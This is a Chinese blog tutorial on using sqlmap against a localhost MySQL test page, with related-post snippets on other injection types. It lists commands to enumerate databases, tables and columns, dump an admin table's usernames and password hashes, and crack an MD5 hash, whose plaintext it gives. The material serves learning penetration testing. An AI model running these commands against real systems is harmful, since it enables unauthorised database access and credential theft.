sqlmap之(四)----Mysql注入实战

骑猪看日落 2022-07-12 14:56 202阅读 0赞

**(1) 查找数据库**

sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs

![20170227161015023][]

数据库有8个。

**(2) 通过第一步的数据库查找表(假如数据库名为test)**

sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --tables

![20170227161249383][]

猜解出来里面存在admin,sqltest两个表。

**(3) 通过2中的表得出列名(假如表为admin)**

sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin --columns

![20170227161453981][]

**(4) 获取字段的值(假如扫描出id,user,pwd字段)**

sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin -C "id,user,pwd" --dump

![20170227161643889][]

do you want to store hashes to a temporary file for eventual further processing with other tools \[y/N\]

你想存储的哈希值来与其他工具最终进一步处理临时文件?   输入"Y"

do you want to crack them via a dictionary-based attack? \[Y/n/q\]

你想通过基于字典的攻击来破解他们吗?  输入"N"

马上就得到了用户名

![20170227161933268][]

与MD5的密码: 3f230640b78d7e71ac5514e57935eb69 去破解下得到"qazxsw"

![20170227162359091][]

[20170227161015023]: /images/20220709/c33d81cb6a6c4027b98ee0079743f0a0.png
[20170227161249383]: /images/20220709/13131eee75f94609aaa4d241a08682d5.png
[20170227161453981]: /images/20220709/2b5dfd1c967c4284a67e7899d6409b12.png
[20170227161643889]: /images/20220709/e7405030fb8a46d5bc7d219f0e94752d.png
[20170227161933268]: /images/20220709/e14a4c230814418080f5fe8ec261472b.png
[20170227162359091]: /images/20220709/a9a53a35a3574def868588071fd4bc8f.png

发表评论取消回复

表情：

评论列表（有 0 条评论，202人围观）

还没有评论，来说两句吧...

相关阅读

相关 sqlmap跑宽字节注入(渗透测试之SQL注入之宽字节注入)

宽字节注入就是用一个大于128的十六进制数来吃掉转义符，gbk编码，字节作为一个字符的编码手工注入一、什么是宽字节注入宽字节是相对于ascII这样单字节而言的；像

今天药忘吃喽~/ 2023年09月26日 10:38/ 0 赞/ 7 阅读

相关 SQL注入之SQLmap入门

> sqlmap也是渗透中常用的一个注入工具，其实在注入工具方面，一个sqlmap就足够用了。现在支持python3了基本参数 is-dba

痛定思痛。/ 2023年06月28日 11:18/ 0 赞/ 7 阅读

相关 write up::web 实战2-注入 --sqlmap注入版

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

ゞ浴缸里的玫瑰/ 2023年06月19日 05:25/ 0 赞/ 5 阅读

相关 SQL注入之SQLmap入门

什么是SQLmap？ SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个非常棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。

冷不防/ 2022年08月21日 01:06/ 0 赞/ 16 阅读

相关 sqlmap之(六)----POST登陆框注入实战

利用sqlmap进行POST注入，常见的有三种方法: 注入方式一： 1.用Burp抓包，然后保存抓取到的内容。例如：保存为post.txt,然后把

本是古典何须时尚/ 2022年07月12日 17:08/ 0 赞/ 490 阅读

相关 sqlmap之(五)----Cookie注入实战

(1) cookie注入，猜解表 sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "i

傷城~/ 2022年07月12日 14:58/ 0 赞/ 546 阅读

相关 sqlmap之(四)----Mysql注入实战

(1) 查找数据库 sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs ![

骑猪看日落/ 2022年07月12日 14:56/ 0 赞/ 203 阅读

相关 sqlmap之(三)----Access注入实战

(1) 猜解是否能注入 sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?

青旅半醒/ 2022年07月12日 14:49/ 0 赞/ 265 阅读

相关 SQLmap实战记录

【-u/--url="url"】 \后面接目标网址，表示测试的目标地址。【-v/--level=number】 \number=\[0-5\]，表示测试结果的详细程度。数

你的名字/ 2022年06月02日 03:13/ 0 赞/ 336 阅读

相关 POST登陆框注入实战（SQLMAP）

利用sqlmap进行POST注入，常见的有三种方法: 注入方式一： 1. 用Burp抓包，然后保存抓取到的内容。例如：保存为post.txt,然后把它放至某

梦里梦外;/ 2022年03月10日 10:54/ 0 赞/ 289 阅读